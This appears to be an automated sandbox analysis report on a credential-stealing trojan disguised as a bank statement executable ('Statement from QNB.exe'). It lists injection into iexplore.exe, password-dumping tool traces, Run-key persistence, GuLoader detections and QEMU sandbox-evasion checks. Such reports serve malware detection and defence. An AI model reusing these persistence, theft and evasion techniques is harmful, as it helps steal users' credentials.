                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe"
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe"
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe"
                    Source: C:\Users\user\Desktop\Statement from QNB.exeProcess created: C:\Users\user\Desktop\Statement from QNB.exe "C:\Users\user\Desktop\Statement from QNB.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Users\user\Desktop\Statement from QNB.exeJump to behavior
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss0.txt"Jump to behavior
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss1.txt"Jump to behavior
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss2.txt"Jump to behavior
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss3.txt"Jump to behavior
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss4.txt"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 14_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,14_2_00410DE1
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeSystem information queried: HandleInformationJump to behavior
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4Jump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeFile created: C:\Users\user\AppData\Local\Temp\~DFB9E9D901A47CB813.TMPJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/16@5/4
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 17_2_00416857 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,17_2_00416857
                    Source: iexplore.exe, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: iexplore.exe, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: iexplore.exe, 0000000C.00000003.81135483040.0000000005EC5000.00000004.00000001.sdmp, iexplore.exe, 0000000C.00000003.81173119870.0000000005F1A000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: iexplore.exe, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: iexplore.exe, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: iexplore.exe, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: iexplore.exe, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 17_2_004163CD GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,17_2_004163CD
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 17_2_00411A64 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,17_2_00411A64
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 14_2_0041208B FindResourceA,SizeofResource,LoadResource,LockResource,14_2_0041208B
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: Binary string: z:\Projects\VS2005\mspass\Release\mspass.pdb source: iexplore.exe, iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: iexplore.exe, iexplore.exe, 00000010.00000000.81129202432.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000010.00000000.81127160331.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: f:\Projects\VS2005\Dialupass\Release\Dialupass.pdb source: iexplore.exe, iexplore.exe, 00000014.00000000.81194973126.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000014.00000002.81199952690.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000014.00000000.81193951260.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: iexplore.exe, iexplore.exe, 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: .pdba source: iexplore.exe, 0000000C.00000003.81100972595.0000000005EA1000.00000004.00000001.sdmp

                    Data Obfuscation:

                    barindex
                    Yara detected GuLoaderShow sources
                    Source: Yara matchFile source: 0000000F.00000002.81297911120.0000000002BE0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.81471342102.0000000002CE0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.80790209471.0000000000560000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.80792180292.00000000022F0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.81650689390.0000000000560000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.81386820299.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000000.81293484753.0000000000560000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.81498277835.0000000000560000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.81577027857.0000000000560000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000000.81384924963.0000000000560000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000000.81467189265.0000000000560000.00000040.00000001.sdmp, type: MEMORY
                    Yara detected VB6 Downloader GenericShow sources
                    Source: Yara matchFile source: Process Memory Space: Statement from QNB.exe PID: 3232, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_0040BE02 push cs; ret 0_2_0040BE0F
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_00401194 push esi; iretd 0_2_00401195
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_004063A0 push edi; iretd 0_2_004063A1
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_022F208A push edi; ret 0_2_022F20B9
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_022F3C8F pushfd ; retf 0_2_022F3C96
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_022F21DE push 81EB8925h; ret 0_2_022F21E3
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 4_3_0087510B pushfd ; ret 4_3_0087510C
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 4_3_0087510B pushfd ; ret 4_3_0087510C
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 4_3_00876D93 push E00084CBh; retf 4_3_00876DD5
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 4_3_00876D93 push E00084CBh; retf 4_3_00876DD5
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 4_3_0087510B pushfd ; ret 4_3_0087510C
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 4_3_0087510B pushfd ; ret 4_3_0087510C
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 4_3_00876D93 push E00084CBh; retf 4_3_00876DD5
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 4_3_00876D93 push E00084CBh; retf 4_3_00876DD5
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 15_2_02BE208A push edi; ret 15_2_02BE20B9
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 15_2_02BE3C8F pushfd ; retf 15_2_02BE3C96
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 15_2_02BE21DE push 81EB8925h; ret 15_2_02BE21E3
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 21_2_006B208A push edi; ret 21_2_006B20B9
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 21_2_006B3C8F pushfd ; retf 21_2_006B3C96
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 21_2_006B21DE push 81EB8925h; ret 21_2_006B21E3
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 22_2_02CE208A push edi; ret 22_2_02CE20B9
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 22_2_02CE3C8F pushfd ; retf 22_2_02CE3C96
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 22_2_02CE21DE push 81EB8925h; ret 22_2_02CE21E3
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 23_2_0056208A push edi; ret 23_2_005620B9
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 23_2_00563C8F pushfd ; retf 23_2_00563C96
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 23_2_005621DE push 81EB8925h; ret 23_2_005621E3
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_3_00A9CF45 push esi; retf 25_3_00A9CF48
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_3_00A9CF45 push esi; retf 25_3_00A9CF48
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_3_00A9CAC7 push FFFFFFDBh; iretd 25_3_00A9CAD8
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_3_00A9CAC7 push FFFFFFDBh; iretd 25_3_00A9CAD8
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeCode function: 25_3_00A9CF45 push esi; retf 25_3_00A9CF48
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 14_2_00404C9D LoadLibraryA,GetProcAddress,14_2_00404C9D
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeJump to dropped file

                    Boot Survival:

                    barindex
                    Creates an undocumented autostart registry key Show sources
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4Jump to behavior
                    Creates autostart registry keys with suspicious namesShow sources
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4Jump to behavior
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4Jump to behavior
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4Jump to behavior
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 16_2_0040F64B memset,strcpy,memset,strcpy,strcat,strcpy,strcat,GetModuleHandleA,LoadLibraryExA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,16_2_0040F64B
                    Source: C:\Users\user\Desktop\Statement from QNB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion:

                    barindex
                    Tries to detect Any.runShow sources
                    Source: C:\Users\user\Desktop\Statement from QNB.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
                    Source: C:\Users\user\Desktop\Statement from QNB.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
